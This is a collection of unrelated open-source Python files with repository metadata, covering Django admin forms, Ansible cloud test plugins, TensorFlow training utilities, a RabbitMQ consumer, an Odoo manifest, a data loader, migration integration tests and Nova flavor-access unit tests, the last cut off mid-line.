'code'] ContentAdminFormset = inlineformset_factory( Page, Content, form=ContentAdminForm, extra=len(settings.LANGUAGES), exclude=['last_modified'])
Haikson/virtenviro
virtenviro/content/admin_forms.py
Python
apache-2.0
4,786
from random import randint from sys import argv if __name__ == '__main__': components_count = int(argv[1]) max_vectors_count = int(argv[2]) high_bound = int(argv[3]) file_name = argv[4] result = set() for i in range(max_vectors_count): result.add(tuple(randint(0, high_bound) for i in range(components_count))) with open(file_name, 'w') as out: out.write('{}\n'.format(components_count)) for item in result: out.write('\t'.join((str(x) for x in item)) + '\n')
vanashimko/k-means
generator.py
Python
mit
526
"""Plugin system for cloud providers and environments for use in integration tests.""" from __future__ import (absolute_import, division, print_function) __metaclass__ = type import abc import atexit import datetime import json import time import os import platform import random import re import tempfile from .. import types as t from ..util import ( ApplicationError, display, is_shippable, import_plugins, load_plugins, ABC, to_bytes, make_dirs, ANSIBLE_TEST_CONFIG_ROOT, ) from ..target import ( TestTarget, ) from ..config import ( IntegrationConfig, ) from ..data import ( data_context, ) PROVIDERS = {} ENVIRONMENTS = {} def initialize_cloud_plugins(): """Import cloud plugins and load them into the plugin dictionaries.""" import_plugins('cloud') load_plugins(CloudProvider, PROVIDERS) load_plugins(CloudEnvironment, ENVIRONMENTS) def get_cloud_platforms(args, targets=None): """ :type args: TestConfig :type targets: tuple[IntegrationTarget] | None :rtype: list[str] """ if isinstance(args, IntegrationConfig): if args.list_targets: return [] if targets is None: cloud_platforms = set(args.metadata.cloud_config or []) else: cloud_platforms = set(get_cloud_platform(target) for target in targets) cloud_platforms.discard(None) return sorted(cloud_platforms) def get_cloud_platform(target): """ :type target: IntegrationTarget :rtype: str | None """ cloud_platforms = set(a.split('/')[1] for a in target.aliases if a.startswith('cloud/') and a.endswith('/') and a != 'cloud/') if not cloud_platforms: return None if len(cloud_platforms) == 1: cloud_platform = cloud_platforms.pop() if cloud_platform not in PROVIDERS: raise ApplicationError('Target %s aliases contains unknown cloud platform: %s' % (target.name, cloud_platform)) return cloud_platform raise ApplicationError('Target %s aliases contains multiple cloud platforms: %s' % (target.name, ', '.join(sorted(cloud_platforms)))) def get_cloud_providers(args, targets=None): """ :type args: IntegrationConfig :type targets: tuple[IntegrationTarget] | None :rtype: list[CloudProvider] """ return [PROVIDERS[p](args) for p in get_cloud_platforms(args, targets)] def get_cloud_environment(args, target): """ :type args: IntegrationConfig :type target: IntegrationTarget :rtype: CloudEnvironment """ cloud_platform = get_cloud_platform(target) if not cloud_platform: return None return ENVIRONMENTS[cloud_platform](args) def cloud_filter(args, targets): """ :type args: IntegrationConfig :type targets: tuple[IntegrationTarget] :return: list[str] """ if args.metadata.cloud_config is not None: return [] # cloud filter already performed prior to delegation exclude = [] for provider in get_cloud_providers(args, targets): provider.filter(targets, exclude) return exclude def cloud_init(args, targets): """ :type args: IntegrationConfig :type targets: tuple[IntegrationTarget] """ if args.metadata.cloud_config is not None: return # cloud configuration already established prior to delegation args.metadata.cloud_config = {} results = {} for provider in get_cloud_providers(args, targets): args.metadata.cloud_config[provider.platform] = {} start_time = time.time() provider.setup() end_time = time.time() results[provider.platform] = dict( platform=provider.platform, setup_seconds=int(end_time - start_time), targets=[target.name for target in targets], ) if not args.explain and results: results_path = 'test/results/data/%s-%s.json' % (args.command, re.sub(r'[^0-9]', '-', str(datetime.datetime.utcnow().replace(microsecond=0)))) data = dict( clouds=results, ) make_dirs(os.path.dirname(results_path)) with open(results_path, 'w') as results_fd: results_fd.write(json.dumps(data, sort_keys=True, indent=4)) class CloudBase(ABC): """Base class for cloud plugins.""" __metaclass__ = abc.ABCMeta _CONFIG_PATH = 'config_path' _RESOURCE_PREFIX = 'resource_prefix' _MANAGED = 'managed' _SETUP_EXECUTED = 'setup_executed' def __init__(self, args): """ :type args: IntegrationConfig """ self.args = args self.platform = self.__module__.split('.')[-1] def config_callback(files): # type: (t.List[t.Tuple[str, str]]) -> None """Add the config file to the payload file list.""" if self._get_cloud_config(self._CONFIG_PATH, ''): if data_context().content.collection: working_path = data_context().content.collection.directory else: working_path = '' pair = (self.config_path, os.path.join(working_path, os.path.relpath(self.config_path, data_context().content.root))) if pair not in files: display.info('Including %s config: %s -> %s' % (self.platform, pair[0], pair[1]), verbosity=3) files.append(pair) data_context().register_payload_callback(config_callback) @property def setup_executed(self): """ :rtype: bool """ return self._get_cloud_config(self._SETUP_EXECUTED, False) @setup_executed.setter def setup_executed(self, value): """ :type value: bool """ self._set_cloud_config(self._SETUP_EXECUTED, value) @property def config_path(self): """ :rtype: str """ return os.path.join(data_context().content.root, self._get_cloud_config(self._CONFIG_PATH)) @config_path.setter def config_path(self, value): """ :type value: str """ self._set_cloud_config(self._CONFIG_PATH, value) @property def resource_prefix(self): """ :rtype: str """ return self._get_cloud_config(self._RESOURCE_PREFIX) @resource_prefix.setter def resource_prefix(self, value): """ :type value: str """ self._set_cloud_config(self._RESOURCE_PREFIX, value) @property def managed(self): """ :rtype: bool """ return self._get_cloud_config(self._MANAGED) @managed.setter def managed(self, value): """ :type value: bool """ self._set_cloud_config(self._MANAGED, value) def _get_cloud_config(self, key, default=None): """ :type key: str :type default: str | int | bool | None :rtype: str | int | bool """ if default is not None: return self.args.metadata.cloud_config[self.platform].get(key, default) return self.args.metadata.cloud_config[self.platform][key] def _set_cloud_config(self, key, value): """ :type key: str :type value: str | int | bool """ self.args.metadata.cloud_config[self.platform][key] = value class CloudProvider(CloudBase): """Base class for cloud provider plugins. Sets up cloud resources before delegation.""" TEST_DIR = 'test/integration' def __init__(self, args, config_extension='.ini'): """ :type args: IntegrationConfig :type config_extension: str """ super(CloudProvider, self).__init__(args) self.remove_config = False self.config_static_name = 'cloud-config-%s%s' % (self.platform, config_extension) self.config_static_path = os.path.join(self.TEST_DIR, self.config_static_name) self.config_template_path = os.path.join(ANSIBLE_TEST_CONFIG_ROOT, '%s.template' % self.config_static_name) self.config_extension = config_extension def filter(self, targets, exclude): """Filter out the cloud tests when the necessary config and resources are not available. :type targets: tuple[TestTarget] :type exclude: list[str] """ skip = 'cloud/%s/' % self.platform skipped = [target.name for target in targets if skip in target.aliases] if skipped: exclude.append(skip) display.warning('Excluding tests marked "%s" which require config (see "%s"): %s' % (skip.rstrip('/'), self.config_template_path, ', '.join(skipped))) def setup(self): """Setup the cloud resource before delegation and register a cleanup callback.""" self.resource_prefix = self._generate_resource_prefix() atexit.register(self.cleanup) # pylint: disable=locally-disabled, no-self-use def get_remote_ssh_options(self): """Get any additional options needed when delegating tests to a remote instance via SSH. :rtype: list[str] """ return [] # pylint: disable=locally-disabled, no-self-use def get_docker_run_options(self): """Get any additional options needed when delegating tests to a docker container. :rtype: list[str] """ return [] def cleanup(self): """Clean up the cloud resource and any temporary configuration files after tests complete.""" if self.remove_config: os.remove(self.config_path) def _use_static_config(self): """ :rtype: bool """ if os.path.isfile(self.config_static_path): display.info('Using existing %s cloud config: %s' % (self.platform, self.config_static_path), verbosity=1) self.config_path = self.config_static_path static = True else: static = False self.managed = not static return static def _write_config(self, content): """ :type content: str """ prefix = '%s-' % os.path.splitext(os.path.basename(self.config_static_path))[0] with tempfile.NamedTemporaryFile(dir=self.TEST_DIR, prefix=prefix, suffix=self.config_extension, delete=False) as config_fd: filename = os.path.join(self.TEST_DIR, os.path.basename(config_fd.name)) self.config_path = filename self.remove_config = True display.info('>>> Config: %s\n%s' % (filename, content.strip()), verbosity=3) config_fd.write(to_bytes(content)) config_fd.flush() def _read_config_template(self): """ :rtype: str """ with open(self.config_template_path, 'r') as template_fd: lines = template_fd.read().splitlines() lines = [l for l in lines if not l.startswith('#')] config = '\n'.join(lines).strip() + '\n' return config @staticmethod def _populate_config_template(template, values): """ :type template: str :type values: dict[str, str] :rtype: str """ for key in sorted(values): value = values[key] template = template.replace('@%s' % key, value) return template @staticmethod def _generate_resource_prefix(): """ :rtype: str """ if is_shippable(): return 'shippable-%s-%s' % ( os.environ['SHIPPABLE_BUILD_NUMBER'], os.environ['SHIPPABLE_JOB_NUMBER'], ) node = re.sub(r'[^a-zA-Z0-9]+', '-', platform.node().split('.')[0]).lower() return 'ansible-test-%s-%d' % (node, random.randint(10000000, 99999999)) class CloudEnvironment(CloudBase): """Base class for cloud environment plugins. Updates integration test environment after delegation.""" def setup_once(self): """Run setup if it has not already been run.""" if self.setup_executed: return self.setup() self.setup_executed = True def setup(self): """Setup which should be done once per environment instead of once per test target.""" @abc.abstractmethod def get_environment_config(self): """ :rtype: CloudEnvironmentConfig """ def on_failure(self, target, tries): """ :type target: IntegrationTarget :type tries: int """ class CloudEnvironmentConfig: """Configuration for the environment.""" def __init__(self, env_vars=None, ansible_vars=None, module_defaults=None, callback_plugins=None): """ :type env_vars: dict[str, str] | None :type ansible_vars: dict[str, any] | None :type module_defaults: dict[str, dict[str, any]] | None :type callback_plugins: list[str] | None """ self.env_vars = env_vars self.ansible_vars = ansible_vars self.module_defaults = module_defaults self.callback_plugins = callback_plugins
aperigault/ansible
test/lib/ansible_test/_internal/cloud/__init__.py
Python
gpl-3.0
13,034
# Copyright 2018 The TensorFlow Authors All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== r"""""" from __future__ import absolute_import from __future__ import division from __future__ import print_function from collections import namedtuple import os import time import tensorflow as tf import gin.tf flags = tf.app.flags flags.DEFINE_multi_string('config_file', None, 'List of paths to the config files.') flags.DEFINE_multi_string('params', None, 'Newline separated list of Gin parameter bindings.') flags.DEFINE_string('train_dir', None, 'Directory for writing logs/summaries during training.') flags.DEFINE_string('master', 'local', 'BNS name of the TensorFlow master to use.') flags.DEFINE_integer('task', 0, 'task id') flags.DEFINE_integer('save_interval_secs', 300, 'The frequency at which ' 'checkpoints are saved, in seconds.') flags.DEFINE_integer('save_summaries_secs', 30, 'The frequency at which ' 'summaries are saved, in seconds.') flags.DEFINE_boolean('summarize_gradients', False, 'Whether to generate gradient summaries.') FLAGS = flags.FLAGS TrainOps = namedtuple('TrainOps', ['train_op', 'meta_train_op', 'collect_experience_op']) class TrainStep(object): """Handles training step.""" def __init__(self, max_number_of_steps=0, num_updates_per_observation=1, num_collect_per_update=1, num_collect_per_meta_update=1, log_every_n_steps=1, policy_save_fn=None, save_policy_every_n_steps=0, should_stop_early=None): """Returns a function that is executed at each step of slim training. Args: max_number_of_steps: Optional maximum number of train steps to take. num_updates_per_observation: Number of updates per observation. log_every_n_steps: The frequency, in terms of global steps, that the loss and global step and logged. policy_save_fn: A tf.Saver().save function to save the policy. save_policy_every_n_steps: How frequently to save the policy. should_stop_early: Optional hook to report whether training should stop. Raises: ValueError: If policy_save_fn is not provided when save_policy_every_n_steps > 0. """ if save_policy_every_n_steps and policy_save_fn is None: raise ValueError( 'policy_save_fn is required when save_policy_every_n_steps > 0') self.max_number_of_steps = max_number_of_steps self.num_updates_per_observation = num_updates_per_observation self.num_collect_per_update = num_collect_per_update self.num_collect_per_meta_update = num_collect_per_meta_update self.log_every_n_steps = log_every_n_steps self.policy_save_fn = policy_save_fn self.save_policy_every_n_steps = save_policy_every_n_steps self.should_stop_early = should_stop_early self.last_global_step_val = 0 self.train_op_fn = None self.collect_and_train_fn = None tf.logging.info('Training for %d max_number_of_steps', self.max_number_of_steps) def train_step(self, sess, train_ops, global_step, _): """This function will be called at each step of training. This represents one step of the DDPG algorithm and can include: 1. collect a <state, action, reward, next_state> transition 2. update the target network 3. train the actor 4. train the critic Args: sess: A Tensorflow session. train_ops: A DdpgTrainOps tuple of train ops to run. global_step: The global step. Returns: A scalar total loss. A boolean should stop. """ start_time = time.time() if self.train_op_fn is None: self.train_op_fn = sess.make_callable([train_ops.train_op, global_step]) self.meta_train_op_fn = sess.make_callable([train_ops.meta_train_op, global_step]) self.collect_fn = sess.make_callable([train_ops.collect_experience_op, global_step]) self.collect_and_train_fn = sess.make_callable( [train_ops.train_op, global_step, train_ops.collect_experience_op]) self.collect_and_meta_train_fn = sess.make_callable( [train_ops.meta_train_op, global_step, train_ops.collect_experience_op]) for _ in range(self.num_collect_per_update - 1): self.collect_fn() for _ in range(self.num_updates_per_observation - 1): self.train_op_fn() total_loss, global_step_val, _ = self.collect_and_train_fn() if (global_step_val // self.num_collect_per_meta_update != self.last_global_step_val // self.num_collect_per_meta_update): self.meta_train_op_fn() time_elapsed = time.time() - start_time should_stop = False if self.max_number_of_steps: should_stop = global_step_val >= self.max_number_of_steps if global_step_val != self.last_global_step_val: if (self.save_policy_every_n_steps and global_step_val // self.save_policy_every_n_steps != self.last_global_step_val // self.save_policy_every_n_steps): self.policy_save_fn(sess) if (self.log_every_n_steps and global_step_val % self.log_every_n_steps == 0): tf.logging.info( 'global step %d: loss = %.4f (%.3f sec/step) (%d steps/sec)', global_step_val, total_loss, time_elapsed, 1 / time_elapsed) self.last_global_step_val = global_step_val stop_early = bool(self.should_stop_early and self.should_stop_early()) return total_loss, should_stop or stop_early def create_counter_summaries(counters): """Add named summaries to counters, a list of tuples (name, counter).""" if counters: with tf.name_scope('Counters/'): for name, counter in counters: tf.summary.scalar(name, counter) def gen_debug_batch_summaries(batch): """Generates summaries for the sampled replay batch.""" states, actions, rewards, _, next_states = batch with tf.name_scope('batch'): for s in range(states.get_shape()[-1]): tf.summary.histogram('states_%d' % s, states[:, s]) for s in range(states.get_shape()[-1]): tf.summary.histogram('next_states_%d' % s, next_states[:, s]) for a in range(actions.get_shape()[-1]): tf.summary.histogram('actions_%d' % a, actions[:, a]) tf.summary.histogram('rewards', rewards)
tombstone/models
research/efficient-hrl/train_utils.py
Python
apache-2.0
7,027
import json import pika import time import threading from flask import current_app from listenbrainz.webserver import create_app from listenbrainz.webserver.views.api_tools import LISTEN_TYPE_PLAYING_NOW from listenbrainz.mbid_mapping_writer.job_queue import MappingJobQueue class MBIDMappingWriter(threading.Thread): """ Main entry point for the mapping writer. Sets up connections and handles messages from RabbitMQ and stuff them into the queue for the job matcher to handle.""" def __init__(self, app): threading.Thread.__init__(self) self.app = app self.queue = None def callback(self, channel, method, properties, body): listens = json.loads(body) self.queue.add_new_listens(listens) channel.basic_ack(method.delivery_tag) def create_and_bind_exchange_and_queue(self, channel, exchange, queue): channel.exchange_declare(exchange=exchange, exchange_type='fanout') channel.queue_declare(callback=lambda x: None, queue=queue, durable=True) channel.queue_bind(callback=lambda x: None, exchange=exchange, queue=queue) def on_open_callback(self, channel): self.create_and_bind_exchange_and_queue( channel, current_app.config['UNIQUE_EXCHANGE'], current_app.config['UNIQUE_QUEUE']) channel.basic_consume( queue=current_app.config['UNIQUE_QUEUE'], on_message_callback=self.callback) def on_open(self, connection): connection.channel(on_open_callback=self.on_open_callback) def init_rabbitmq_connection(self): while True: try: credentials = pika.PlainCredentials( current_app.config['RABBITMQ_USERNAME'], current_app.config['RABBITMQ_PASSWORD']) connection_parameters = pika.ConnectionParameters( host=current_app.config['RABBITMQ_HOST'], port=current_app.config['RABBITMQ_PORT'], virtual_host=current_app.config['RABBITMQ_VHOST'], credentials=credentials, ) self.connection = pika.SelectConnection( parameters=connection_parameters, on_open_callback=self.on_open) break except Exception as e: current_app.logger.error( "Error while connecting to RabbitMQ: %s", str(e), exc_info=True) time.sleep(3) def run(self): with self.app.app_context(): current_app.logger.info("Starting queue stuffer...") self.queue = MappingJobQueue(app) # start the queue stuffer thread self.queue.start() while True: current_app.logger.info("Starting MBID mapping writer...") self.init_rabbitmq_connection() try: self.connection.ioloop.start() except KeyboardInterrupt: self.submit_delivery_tags() self.queue.terminate() current_app.logger.error("Keyboard interrupt!") break except Exception as e: current_app.logger.error( "Error in MBID Mapping Writer: %s", str(e), exc_info=True) time.sleep(3) if __name__ == "__main__": app = create_app() mw = MBIDMappingWriter(app) mw.start()
metabrainz/listenbrainz-server
listenbrainz/mbid_mapping_writer/mbid_mapping_writer.py
Python
gpl-2.0
3,503
# -*- coding: utf-8 -*- ############################################################################## # # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## { 'name': 'Convert Selection To Filter', 'version': '1.1', 'category': 'Web', 'description': """ FILTER BY SELECTION =============== This module allows you to convet your selected records in a list view to a search view filter. """, 'author': "Mehdi Samadi ", 'website': 'http://www.webirani.co', 'license': 'AGPL-3', 'depends': ['web'], # 'external_dependencies': { # 'python': ['xlwt'], # }, 'qweb': ['static/xml/filter_by_selection.xml'], 'js': ['static/*/*.js', 'static/*/js/*.js'], 'installable': True, 'auto_install': False, 'web_preload': False, }
smartforceplus/SmartForceplus
.local/share/Odoo/addons/8.0/ConvertSelectionToFilter/__openerp__.py
Python
agpl-3.0
1,506
from MaudeMiner.core.database import db from MaudeMiner.core.models import Narrative from MaudeMiner.utils import update_progress from MaudeMiner.core.loader.utils import * from MaudeMiner.settings import LINES_PER_DB_COMMIT EXPECTED_NUMBER_OF_FIELDS = 6 def load(limit_commits=None): # ensure tables exists db.create_tables(["Narratives"]) print " === Loading Narratives === " files = get_files_with_prefix("foitext", excludes=["foitextChange", 'foitextAdd']) num_commits = 0 for line in files: v = split_fields(line) if len(v) != EXPECTED_NUMBER_OF_FIELDS: continue narrative = Narrative() narrative.report_key = v[0] narrative.text_key = v[1] narrative.text_type_code = v[2] narrative.patient_sequence_number = v[3] narrative.date_report = v[4] narrative.text = v[5] db.save(narrative, commit=False) if files.filelineno() % 1000 == 0: if files.filelineno() % LINES_PER_DB_COMMIT == 0: db.commit() update_progress("Loaded: ", files.filelineno(), LINES_IN_CURRENT_FILE[0]) num_commits += 1 if limit_commits and num_commits == limit_commits: break db.commit() print "\n # Done # \n"
tklovett/MaudeMiner
MaudeMiner/core/loader/narratives.py
Python
mit
1,218
#Copyright (C) 2013-2014 by Clearcode <http://clearcode.cc> #and associates (see AUTHORS). # #This file is part of migopy. # #Migopy is free software: you can redistribute it and/or modify #it under the terms of the GNU Lesser General Public License as published by #the Free Software Foundation, either version 3 of the License, or #(at your option) any later version. # #Migopy is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU Lesser General Public License for more details. # #You should have received a copy of the GNU Lesser General Public License #along with migopy. If not, see <http://www.gnu.org/licenses/>. import migopy import subprocess import pymongo.errors import unittest from glob import glob from tests import TestDirectory files = dict() files['fabfile.py'] = """ import migopy class Migrations(migopy.MigrationsManager): MONGO_DATABASE = 'migopy_db_test' migrations = Migrations.create_task() """ fabfile_with_task = """ import migopy from fabric.api import task class Migrations(migopy.MigrationsManager): MONGO_DATABASE = 'migopy_db_test' migrations = task(Migrations.create_task()) """ fabfile_with_mongodump = """ import migopy class Migrations(migopy.MigrationsManager): MONGO_DATABASE = 'migopy_db_test' DO_MONGO_DUMP = True migrations = Migrations.create_task() """ files['mongomigrations/001_test.py'] = """ def up(db): db.test_collection.insert({'test_key': 'test_content'}) def down(db): pass """ files['mongomigrations/2_test.py'] = """ def up(db): pass def down(db): pass """ def call(command): """Helper for calling shell commands with stdout, stderr handling""" proc = subprocess.Popen(command, shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE) merr = proc.stderr.read() print(merr) print(proc.stdout.read()) return merr class MongoMigrationsIntegratedBehavior(unittest.TestCase): def setUp(self): class Migrations(migopy.MigrationsManager): MONGO_DATABASE = 'migopy_db_test' self.Migrations = Migrations self.migr_mng = Migrations() self.tmp_dir = TestDirectory() self.tmp_dir.__enter__() self.tmp_dir.mkdir('mongomigrations') for path in files: self.tmp_dir.create_file(path, files[path]) def tearDown(self): self.migr_mng.mongo_client.drop_database(self.migr_mng.MONGO_DATABASE) self.tmp_dir.__exit__(None, None, None) def test_it_connects_with_mongo_database(self): self.migr_mng.db.migo_coll.insert({'name': 'migo_test'}) self.assertFalse( self.migr_mng.db.migo_coll.find_one({'name': 'test_migo'})) self.assertTrue( self.migr_mng.db.migo_coll.find_one({'name': 'migo_test'})) # when user data given to connection self.migr_mng.db.add_user('migopy', 'migopy_pass') class Migrations(migopy.MigrationsManager): MONGO_DATABASE = 'migopy_db_test' MONGO_USER = 'migopy' MONGO_USER_PASS = 'migopy_pass' Migrations() self.migr_mng.db.remove_user('migopy') def test_it_do_fab_migrations(self): self.migr_mng.collection.insert({'name': '001_test.py'}) msg = call('fab migrations') self.assertIn('2_test.py', msg) self.assertNotIn('001_test.py', msg) def test_it_do_fab_migrations_execute(self): call('fab migrations:execute') msg = call('fab migrations') self.assertNotIn('001_test.py', msg) self.assertNotIn('2_test.py', msg) self.assertTrue(self.migr_mng.db.test_collection.find_one( {'test_key': 'test_content'})) self.assertIn('All migrations', msg) def test_it_do_fab_migrations_execute_001_test(self): call('fab migrations:execute,001_test.py') msg = call('fab migrations') self.assertNotIn('001_test.py', msg) self.assertIn('2_test.py', msg) def test_it_do_fab_migrations_ignore(self): call('fab migrations:ignore') msg = call('fab migrations') self.assertNotIn('001_test.py', msg) self.assertNotIn('2_test.py', msg) self.assertIn('All migrations', msg) def test_it_do_fab_migrations_ignore_001_test(self): call('fab migrations:ignore,001_test.py') msg = call('fab migrations') self.assertNotIn('001_test.py', msg) self.assertIn('2_test.py', msg) def test_it_do_fab_migrations_dbdump(self): self.assertEqual(len(glob('mongodumps/*')), 0) call('fab migrations:dbdump') self.assertEqual(len(glob('mongodumps/*')), 1) def test_it_do_dbdump_during_fab_migrations_execute(self): self.assertEqual(len(glob('mongodumps/*')), 0) self.tmp_dir.create_file('fabfile.py', fabfile_with_mongodump) call('fab migrations:execute') self.assertEqual(len(glob('mongodumps/*')), 1) def test_it_works_with_fabric_task_decorator(self): self.tmp_dir.create_file('fabfile.py', fabfile_with_task) msg = call('fab migrations') self.assertNotIn('not found', msg, msg) self.assertIn('2_test.py', msg) self.assertIn('001_test.py', msg)
ClearcodeHQ/migopy
tests/test_integrations.py
Python
lgpl-3.0
5,392
# Copyright 2012 OpenStack Foundation # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import datetime import mock from webob import exc from nova.api.openstack import api_version_request as api_version from nova.api.openstack.compute import flavor_access \ as flavor_access_v21 from nova.api.openstack.compute import flavors as flavors_api from nova import context from nova import exception from nova import test from nova.tests.unit.api.openstack import fakes def generate_flavor(flavorid, ispublic): return { 'id': flavorid, 'flavorid': str(flavorid), 'root_gb': 1, 'ephemeral_gb': 1, 'name': u'test', 'deleted': False, 'created_at': datetime.datetime(2012, 1, 1, 1, 1, 1, 1), 'updated_at': None, 'memory_mb': 512, 'vcpus': 1, 'swap': 512, 'rxtx_factor': 1.0, 'disabled': False, 'extra_specs': {}, 'deleted_at': None, 'vcpu_weight': None, 'is_public': bool(ispublic) } INSTANCE_TYPES = { '0': generate_flavor(0, True), '1': generate_flavor(1, True), '2': generate_flavor(2, False), '3': generate_flavor(3, False)} ACCESS_LIST = [{'flavor_id': '2', 'project_id': 'proj2'}, {'flavor_id': '2', 'project_id': 'proj3'}, {'flavor_id': '3', 'project_id': 'proj3'}] def fake_get_flavor_access_by_flavor_id(context, flavorid): res = [] for access in ACCESS_LIST: if access['flavor_id'] == flavorid: res.append(access) return res def fake_get_flavor_by_flavor_id(context, flavorid, read_deleted=None): return INSTANCE_TYPES[flavorid] def _has_flavor_access(flavorid, projectid): for access in ACCESS_LIST: if access['flavor_id'] == flavorid and \ access['project_id'] == projectid: return True return False def fake_get_all_flavors_sorted_list(context, inactive=False, filters=None, sort_key='flavorid', sort_dir='asc', limit=None, marker=None): if filters is None or filters['is_public'] is None: return sorted(INSTANCE_TYPES.values(), key=lambda item: item[sort_key]) res = {} for k, v in INSTANCE_TYPES.items(): if filters['is_public'] and _has_flavor_access(k, context.project_id): res.update({k: v}) continue if v['is_public'] == filters['is_public']: res.update({k: v}) res = sorted(res.values(), key=lambda item: item[sort_key]) return res class FakeRequest(object): environ = {"nova.context": context.get_admin_context()} api_version_request = api_version.APIVersionRequest("2.1") def get_db_flavor(self, flavor_id): return INSTANCE_TYPES[flavor_id] def is_legacy_v2(self): return False class FakeResponse(object): obj = {'flavor': {'id': '0'}, 'flavors': [ {'id': '0'}, {'id': '2'}] } def attach(self, **kwargs): pass def fake_get_flavor_projects_from_db(context, flavorid): raise exception.FlavorNotFound(flavor_id=flavorid) class FlavorAccessTestV21(test.NoDBTestCase): api_version = "2.1" FlavorAccessController = flavor_access_v21.FlavorAccessController FlavorActionController = flavor_access_v21.FlavorActionController _prefix = "/v2/fake" validation_ex = exception.ValidationError def setUp(self): super(FlavorAccessTestV21, self).setUp() self.flavor_controller = flavors_api.FlavorsController() self.req = FakeRequest() self.req.environ = {"nova.context": context.RequestContext('fake_user', 'fake')} self.stub_out('nova.db.flavor_get_by_flavor_id', fake_get_flavor_by_flavor_id) self.stub_out('nova.db.flavor_get_all', fake_get_all_flavors_sorted_list) self.stub_out('nova.db.flavor_access_get_by_flavor_id', fake_get_flavor_access_by_flavor_id) # Simulate no API flavors right now self.stub_out('nova.objects.flavor._flavor_get_all_from_db', lambda *a, **k: []) self.stub_out('nova.objects.Flavor.in_api', False) self.stub_out('nova.objects.flavor._get_projects_from_db', fake_get_flavor_projects_from_db) self.flavor_access_controller = self.FlavorAccessController() self.flavor_action_controller = self.FlavorActionController() def _verify_flavor_list(self, result, expected): # result already sorted by flavor_id self.assertEqual(len(result), len(expected)) for d1, d2 in zip(result, expected): self.assertEqual(d1['id'], d2['id']) @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_list_flavor_access_public(self, mock_api_get): # query os-flavor-access on public flavor should return 404 self.assertRaises(exc.HTTPNotFound, self.flavor_access_controller.index, self.req, '1') @mock.patch('nova.objects.Flavor._flavor_get_by_flavor_id_from_db', side_effect=exception.FlavorNotFound(flavor_id='foo')) def test_list_flavor_access_private(self, mock_api_get): expected = {'flavor_access': [ {'flavor_id': '2', 'tenant_id': 'proj2'}, {'flavor_id': '2', 'tenant_id': 'proj3'}]} result = self.flavor_access_controller.index(self.req, '2') self.assertEqual(result, expected) def test_list_flavor_with_admin_default_proj1(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} req = fakes.HTTPRequest.blank(self._prefix + '/flavors', use_admin_context=True) req.environ['nova.context'].project_id = 'proj1' result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_admin_default_proj2(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}, {'id': '2'}]} req = fakes.HTTPRequest.blank(self._prefix + '/flavors', use_admin_context=True) req.environ['nova.context'].project_id = 'proj2' result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_admin_ispublic_true(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} url = self._prefix + '/flavors?is_public=true' req = fakes.HTTPRequest.blank(url, use_admin_context=True) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_admin_ispublic_false(self): expected = {'flavors': [{'id': '2'}, {'id': '3'}]} url = self._prefix + '/flavors?is_public=false' req = fakes.HTTPRequest.blank(url, use_admin_context=True) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_admin_ispublic_false_proj2(self): expected = {'flavors': [{'id': '2'}, {'id': '3'}]} url = self._prefix + '/flavors?is_public=false' req = fakes.HTTPRequest.blank(url, use_admin_context=True) req.environ['nova.context'].project_id = 'proj2' result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_admin_ispublic_none(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}, {'id': '2'}, {'id': '3'}]} url = self._prefix + '/flavors?is_public=none' req = fakes.HTTPRequest.blank(url, use_admin_context=True) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_no_admin_default(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} req = fakes.HTTPRequest.blank(self._prefix + '/flavors', use_admin_context=False) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_no_admin_ispublic_true(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} url = self._prefix + '/flavors?is_public=true' req = fakes.HTTPRequest.blank(url, use_admin_context=False) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_no_admin_ispublic_false(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} url = self._prefix + '/flavors?is_public=false' req = fakes.HTTPRequest.blank(url, use_admin_context=False) result = self.flavor_controller.index(req) self._verify_flavor_list(result['flavors'], expected['flavors']) def test_list_flavor_with_no_admin_ispublic_none(self): expected = {'flavors': [{'id': '0'}, {'id': '1'}]} url = self._prefix + '/flavors?is_public=none' req = fakes.HTTPRequest.blank(url, 